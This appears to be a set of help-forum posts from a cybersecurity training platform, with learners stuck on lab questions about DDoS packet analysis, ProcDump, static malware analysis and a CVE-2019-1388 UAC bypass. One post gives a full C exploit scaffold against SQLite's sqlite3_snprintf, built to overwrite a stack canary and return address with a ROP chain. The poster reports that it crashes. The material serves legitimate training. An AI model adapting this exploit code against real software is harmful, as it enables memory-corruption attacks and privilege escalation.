DDOS Analysis: UDP Flood (Question 8)
I'm working through the DDoS UDP Analysis lab and am currently stuck on question 8. I've used both the Statistics > Summary tool within Wireshark and also capinfos to try to determine the total length of the DDoS attack. However, the time difference I'm coming up with through both methods is not the correct answer. Any suggestions?

Linux Stack Overflow Ep.6
I am having trouble figuring out this lab. I got the other questions, but can't get the token. This is the code I am running, but it just causes a segmentation fault.

    #include <assert.h>
    #include <stdio.h>
    #include <stdint.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sqlite3.h>

    #define RETADDR_OFFSET 0
    #define CANARY_OFFSET 0x40
    #define BUF_OFFSET 0x88
    #define CANARY 0xbaadd00dbaadd00dull
    #define ROPGADGET 0xdeadbeefdeadbeefull
    #define NGADGETS 1

    struct payload {
        uint8_t padding1[BUF_OFFSET-CANARY_OFFSET];
        uint64_t canary;
        uint8_t padding2[CANARY_OFFSET-RETADDR_OFFSET-8];
        uint64_t ropchain[NGADGETS];
    } __attribute__((packed, aligned(1)));

    int main(int argc, char *argv[]) {
        char dst[256];
        struct payload p;
        memset(p.padding1, 'a', sizeof(p.padding1));
        p.canary = CANARY;
        memset(p.padding2, 'b', sizeof(p.padding2));
        p.ropchain[0] = ROPGADGET;
        size_t target_n = 0x80000000;
        assert(sizeof(p) + 3 <= target_n);
        size_t n = target_n - sizeof(p) - 3;
        size_t target_i = 0x100000000 + (sizeof(p) / 2);
        char *src = calloc(1, target_i);
        if (!src) {
            printf("bad allocation\n");
            return -1;
        }
        size_t cur = 0;
        memcpy(src, &p, sizeof(p));
        cur += sizeof(p);
        memset(src+cur, '\'', n/2);
        cur += n/2;
        assert(cur < 0x7ffffffeul);
        memset(src+cur, 'c', 0x7ffffffeul-cur);
        cur += 0x7ffffffeul-cur;
        src[cur] = '\xc0';
        cur++;
        memset(src+cur, '\x80', target_i - cur);
        cur = target_i;
        src[cur-1] = '\0';
        sqlite3_snprintf((int) 256, dst, "'%!q'", src);
        free(src);
        return 0;
    }

Windows Sysinternals: ProcDump
What exception is reported by ProcDump when monitoring the execution of ExceptionCatcher.exe? I've started "cmd" as administrator but I get the following message. No clue how to launch procdump and how to see the exception. I've tried with:

    procdump.exe -e 1 c:\Users\IMLUser\Desktop\ExceptionCatcher.exe exception.dmp
    procdump.exe -ma c:\Users\IMLUser\Desktop\ExceptionCatcher.exe exception.dmp

Thanks in advance

Practical Malware Analysis: Static Analysis question 19
For what native Microsoft service is this malware trying to masquerade, with a legitimate-seeming name and a reference to a file path that can be used for persistence? For some reason, when typing in the Microsoft Security Center (2.0) Service name and the info gained from the registry path HKCU\Software\Microsoft\Windows\CurrentVersion\Run\, it keeps saying that it is wrong. I am wondering what format they are expecting for the answer, or if I am using the wrong name, as mssecsvc2.0 is also wrong.

Practical Malware Analysis: Static Analysis question 18
For finding the exact name of the executable file: after dynamically overriding the function as shown in the briefing, I can't seem to find any meaningful creation of the filename matching the pattern provided in sprintf. I am wondering if I should be overriding a different function, as I can't seem to find any meaningful leads when searching for references or traveling to the next data. I also can't seem to find any leads from searching specifically for local_104 and unaff_EDI references.

CVE-2019-1388 (Windows Priv Esc UAC Bypass) question 4
After transferring the certificate of the executable given online, and changing the name and saving the file, I can't seem to change the whoami output to NT Authority. Should I be targeting a different executable file, like a legitimate one? Should browsing to the certificate error be displayed as unable to connect, or should I be getting a different error? After downloading the certificate, should I be doing something else other than immediately going to cmd.exe and typing whoami, i.e. running the certificate or storing it somewhere other than under the name told in the briefing? Saving the certificate does not seem to change anything.